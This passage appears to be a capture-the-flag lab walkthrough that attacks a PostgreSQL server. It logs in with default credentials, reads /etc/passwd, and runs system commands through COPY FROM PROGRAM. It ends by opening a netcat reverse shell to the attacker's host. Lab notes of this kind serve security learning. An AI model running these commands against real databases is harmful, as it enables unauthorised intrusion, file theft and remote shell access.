3 :5437 postgresql

# trying default creds
postgres:postgres

$ psql -h 192.168.122.47 -p 5437 -U postgres
Password for user postgres: postgres
psql (13.3 (Debian 13.3-1), server 11.7 (Debian 11.7-0+deb10u1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=# SELECT version();
                                                    version
----------------------------------------------------------------------------------------------------------------
 PostgreSQL 11.7 (Debian 11.7-0+deb10u1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit
(1 row)

# Found exploit that works on v9.3 - latest
Using https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

# explore dir-structure
postgres=# SELECT pg_ls_dir('./');

postgres=# SELECT pg_ls_dir('/home');
 pg_ls_dir
-----------
 wilson
(1 row)

postgres=# SELECT pg_ls_dir('/home/wilson');
   pg_ls_dir
---------------
 .bash_logout
 .gnupg
 .bash_history
 .profile
 local.txt
 .bashrc
 ftp
(7 rows)

# to read files
# SELECT pg_read_file('<file>');
[OR] we need to create a table 
# CREATE TABLE <t-name> (out TEXT);
# COPY <t-name> FROM '<file-path>';
# data is appended on multiple COPY
# SELECT * FROM <t-name>;
# TRUNCATE <t-name> to empty the contents


# Reading /etc/passwd
postgres=# CREATE TABLE kashz (out TEXT);
CREATE TABLE
postgres=# COPY kashz from '/etc/passwd';
COPY 29
postgres=# SELECT * from kashz;
out
-------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
wilson:x:1000:1000:wilson,,,:/home/wilson:/bin/bash
(29 rows)

# run system command
COPY <t-name> FROM PROGRAM '<cmd>';

postgres=# COPY kashz FROM PROGRAM 'whoami;id;hostname;uname -a';
COPY 4
postgres=# SELECT * from kashz;
out
------------------------------------------------------------------------------------
postgres
uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)
nibbles
Linux nibbles 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
(4 rows)

postgres=# COPY kashz from PROGRAM '/usr/bin/nc -e /bin/bash 192.168.49.122 80';

$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.122] from (UNKNOWN) [192.168.122.47] 57814
whoami;id
postgres
uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)
Previous4 box enum > privesc > rootNext2 :80

Last updated